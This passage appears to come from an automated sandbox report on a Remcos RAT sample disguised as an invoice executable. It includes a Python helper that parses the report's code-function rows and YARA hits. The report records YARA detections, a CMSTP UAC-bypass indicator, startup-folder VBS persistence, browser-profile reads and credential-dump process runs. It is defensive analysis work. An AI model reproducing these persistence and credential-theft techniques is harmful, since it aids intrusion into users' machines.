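    r"Matched rule:\s*(?P<rule>\S+)")


def parse_code_functions(text):
    """Return {process_number: [address, ...]} from the 'Code function' rows."""
    funcs = defaultdict(list)
    for m in CODE_RE.finditer(text):
        funcs[int(m["pid"])].append(int(m["addr"], 16))
    return dict(funcs)


def relocation_delta(funcs, pid_a, pid_b):
    """Most common (addr_b - addr_a) over all cross pairs, with its support.

    Support close to the size of the smaller list means the two processes run
    the same code at a constant offset (same image, different load base).
    Addresses with no counterpart (e.g. heap-resident code) simply do not vote.
    Returns (delta, support, size_of_smaller_list)."""
    votes = Counter(b - a for a in funcs[pid_a] for b in funcs[pid_b])
    delta, support = votes.most_common(1)[0]
    return delta, support, min(len(funcs[pid_a]), len(funcs[pid_b]))


def matched_addresses(funcs, pid_a, pid_b, delta):
    """Addresses of pid_a whose shifted counterpart (addr + delta) exists in pid_b."""
    targets = set(funcs[pid_b])
    return sorted(a for a in funcs[pid_a] if a + delta in targets)


def process_of_source(source):
    """Process number from a source name (assumed naming: '13.2.x.unpack' is
    process 13; '0000000A.00000002....sdmp' is process 0x0A = 10)."""
    head = source.split(".", 1)[0]
    return int(head, 16) if len(head) == 8 else int(head)


def yara_hits_by_process(text):
    """{rule: [process numbers]} with raw.unpack/unpack/sdmp duplicates collapsed."""
    hits = defaultdict(set)
    for m in YARA_RE.finditer(text):
        hits[m["rule"]].add(process_of_source(m["src"]))
    return {rule: sorted(pids) for rule, pids in hits.items()}


if __name__ == "__main__":
    funcs = parse_code_functions(SAMPLE_ROWS)
    delta, support, n = relocation_delta(funcs, 0, 2)
    print(f"process 0 -> process 2: delta {delta:+#x}, {support}/{n} functions line up")
    for a in matched_addresses(funcs, 0, 2, delta):
        print(f"  {a:08X} -> {a + delta:08X}")
    for rule, pids in sorted(yara_hits_by_process(SAMPLE_ROWS).items()):
        print(f"{rule}: processes {pids}")
```

On the sample rows the delta comes out as -0x1F0000 with three of four addresses lining up; the two that do not (011704C8 and 00FF3438) sit outside the shifted image range, which is the expected shape for code the report found in a separately allocated region. Feeding the script the full row set from this page (after un-fusing nothing, since the regexes accept the fused form) gives the same delta with far higher support.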
Source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Remcos_b296e965 (reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23)
Source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: REMCOS_RAT_variants (Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda)
Source: 13.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003))
Source: 10.2.turbinals.exe.ec0000.1.unpack, type: UNPACKEDPE, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (rule metadata as listed above)
Source: 13.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (rule metadata as listed above)
Source: 3.2.turbinals.exe.3bb0000.2.raw.unpack, type: UNPACKEDPE, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (rule metadata as listed above)
Source: 3.2.turbinals.exe.3bb0000.2.unpack, type: UNPACKEDPE, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (rule metadata as listed above)
Source: 13.2.turbinals.exe.3180000.2.unpack, type: UNPACKEDPE, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (rule metadata as listed above)
Source: 2.2.turbinals.exe.3490000.1.unpack, type: UNPACKEDPE, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (rule metadata as listed above)
Source: 3.2.turbinals.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (rule metadata as listed above)
Source: 9.2.turbinals.exe.1d00000.1.unpack, type: UNPACKEDPE, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (rule metadata as listed above)
Source: 9.2.turbinals.exe.1d00000.1.raw.unpack, type: UNPACKEDPE, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (rule metadata as listed above)
Source: 3.2.turbinals.exe.400000.0.unpack, type: UNPACKEDPE, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (rule metadata as listed above)
Source: 13.2.turbinals.exe.3180000.2.raw.unpack, type: UNPACKEDPE, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (rule metadata as listed above)
Source: 11.2.turbinals.exe.35d0000.1.raw.unpack, type: UNPACKEDPE, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (rule metadata as listed above)
Source: 10.2.turbinals.exe.ec0000.1.raw.unpack, type: UNPACKEDPE, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (rule metadata as listed above)
Source: 2.2.turbinals.exe.3490000.1.raw.unpack, type: UNPACKEDPE, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (rule metadata as listed above)
Source: 11.2.turbinals.exe.35d0000.1.unpack, type: UNPACKEDPE, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (rule metadata as listed above)
Source: 0000000A.00000002.1447676377.0000000000EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (rule metadata as listed above)
Source: 0000000D.00000002.1464360222.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (rule metadata as listed above)
Source: 00000003.00000002.3755615958.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (rule metadata as listed above)
Source: 0000000D.00000002.1465367687.0000000003180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rules: Windows_Trojan_Remcos_b296e965, REMCOS_RAT_variants, INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM (rule metadata as listed above)
Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Remcos_b296e965 (rule metadata as listed above)
                    Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000009.00000002.1437439643.0000000001D00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000003.00000002.3761470850.0000000003BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000002.00000002.1313746191.0000000003490000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000B.00000002.1457935230.00000000035D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: Process Memory Space: turbinals.exe PID: 7720, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: turbinals.exe PID: 7744, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: turbinals.exe PID: 8108, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: turbinals.exe PID: 8124, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: turbinals.exe PID: 8144, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: turbinals.exe PID: 4984, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winEXE@20/14@1/2
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F3A06A GetLastError,FormatMessageW,0_2_00F3A06A
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F281CB AdjustTokenPrivileges,CloseHandle,0_2_00F281CB
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F287E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00F287E1
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D381CB AdjustTokenPrivileges,CloseHandle,2_2_00D381CB
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Code function: 2_2_00D387E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00D387E1
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F3B3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00F3B3FB
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F4EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00F4EE0D
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00F483BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,0_2_00F483BB
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Code function: 0_2_00ED4E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00ED4E89
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | File created: C:\Users\user\AppData\Local\acceptancy
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-R1T905
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | File created: C:\Users\user\AppData\Local\Temp\aut5CD6.tmp
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs"
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | System information queried: HandleInformation
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: turbinals.exe, 00000003.00000002.3761912147.0000000006C50000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000005.00000002.1381350683.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: turbinals.exe, 00000003.00000002.3762011579.0000000006CD0000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000003.00000002.3761912147.0000000006C50000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000005.00000002.1381350683.0000000000400000.00000040.80000000.00040000.00000000.sdmp, turbinals.exe, 00000006.00000002.1368239205.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: turbinals.exe, 00000003.00000002.3761912147.0000000006C50000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000005.00000002.1381350683.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: turbinals.exe, 00000003.00000002.3761912147.0000000006C50000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000005.00000002.1381350683.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: turbinals.exe, 00000003.00000002.3761912147.0000000006C50000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000005.00000002.1381350683.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: turbinals.exe, 00000003.00000002.3761912147.0000000006C50000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000005.00000002.1381350683.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: turbinals.exe, 00000005.00000003.1378980020.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000005.00000003.1380890752.0000000002AB1000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000005.00000002.1382093472.0000000002ABC000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000005.00000003.1378729995.0000000002ABE000.00000004.00000020.00020000.00000000.sdmp, turbinals.exe, 00000005.00000003.1381105492.0000000002ABC000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: turbinals.exe, 00000003.00000002.3761912147.0000000006C50000.00000040.10000000.00040000.00000000.sdmp, turbinals.exe, 00000005.00000002.1381350683.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: z49FACTURA-0987678.exe | ReversingLabs: Detection: 26%
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | File read: C:\Users\user\Desktop\z49FACTURA-0987678.exe
Source: unknown | Process created: C:\Users\user\Desktop\z49FACTURA-0987678.exe "C:\Users\user\Desktop\z49FACTURA-0987678.exe"
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Process created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe "C:\Users\user\Desktop\z49FACTURA-0987678.exe"
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe "C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\ntpiwvxpqbhwumsvyl"
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\pvdaxohiejzjxsohpwwof"
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe C:\Users\user\AppData\Local\acceptancy\turbinals.exe /stext "C:\Users\user\AppData\Local\Temp\apitxysksrrohzclyhjpqrrk"
Source: unknown | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\turbinals.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe "C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe "C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe "C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Process created: C:\Users\user\AppData\Local\acceptancy\turbinals.exe "C:\Users\user\AppData\Local\acceptancy\turbinals.exe"
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\z49FACTURA-0987678.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\acceptancy\turbinals.exe | Section loaded: dnsapi.dll
